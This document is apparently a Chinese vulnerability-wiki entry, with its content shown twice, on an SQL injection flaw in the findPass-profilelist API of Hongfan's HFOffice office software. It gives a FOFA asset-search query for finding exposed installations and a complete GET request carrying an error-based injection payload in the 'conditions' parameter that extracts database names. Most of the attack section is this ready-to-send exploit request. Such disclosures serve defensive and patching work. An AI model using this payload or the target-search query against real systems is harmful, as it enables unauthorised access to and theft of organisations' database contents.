fofamini-wiki

登录白背景

源码

红帆HFOffice findPass-profilelist存在SQL注入漏洞

一、漏洞简介

红帆iOffice移动办公系统，是广州红帆电脑科技有限公司基于微软.NET技术研发的，建立以笔记本、手机等便捷终端为载体实现的移动信息化系统。将智能手机、无线网络、OA系统三者有机结合，推出红帆iOffice移动办公系统，实现任何办公地点和办公时间的无缝接入，提高办公效率。红帆HFOffice findPass-profilelist存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。

二、影响版本

红帆HFOffice

三、资产测绘

fofaapp="红帆-HFOffice"
特征

四、漏洞复现

GET /api/user-profile-mode/findPass-profilelist?sorts=%255B%255D&conditions=[{"Field":"convert%28int%2C%28select+db_name%282%29%29%29","DataType":2,"Option":1,"Value":""}]&userId=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/102.0.5005.63 Safari/537.36

原文: https://www.yuque.com/xiaokp7/ocvun2/yba2voh9hol2toaz

# 红帆HFOffice findPass-profilelist存在SQL注入漏洞

# 一、漏洞简介
红帆iOffice移动办公系统，是广州红帆电脑科技有限公司基于微软.NET技术研发的，建立以笔记本、手机等便捷终端为载体实现的移动信息化系统。将智能手机、无线网络、OA系统三者有机结合，推出红帆iOffice移动办公系统，实现任何办公地点和办公时间的无缝接入，提高办公效率。红帆HFOffice findPass-profilelist存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感数据。

# 二、影响版本
+ 红帆HFOffice

# 三、资产测绘
+ fofa`app="红帆-HFOffice"`
+ 特征

![1716452438963-a6f1f3b3-faf2-43df-9b01-cb8255f2c3b4.png](./img/Qt4nkhn1ppzxJjXo/1716452438963-a6f1f3b3-faf2-43df-9b01-cb8255f2c3b4-565020.png)

# 四、漏洞复现
```plain
GET /api/user-profile-mode/findPass-profilelist?sorts=%255B%255D&conditions=[{"Field":"convert%28int%2C%28select+db_name%282%29%29%29","DataType":2,"Option":1,"Value":""}]&userId=1 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/102.0.5005.63 Safari/537.36
```

![1717009894252-377803eb-4d4b-46c2-9170-c45ccda7918e.png](./img/Qt4nkhn1ppzxJjXo/1717009894252-377803eb-4d4b-46c2-9170-c45ccda7918e-037005.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/yba2voh9hol2toaz>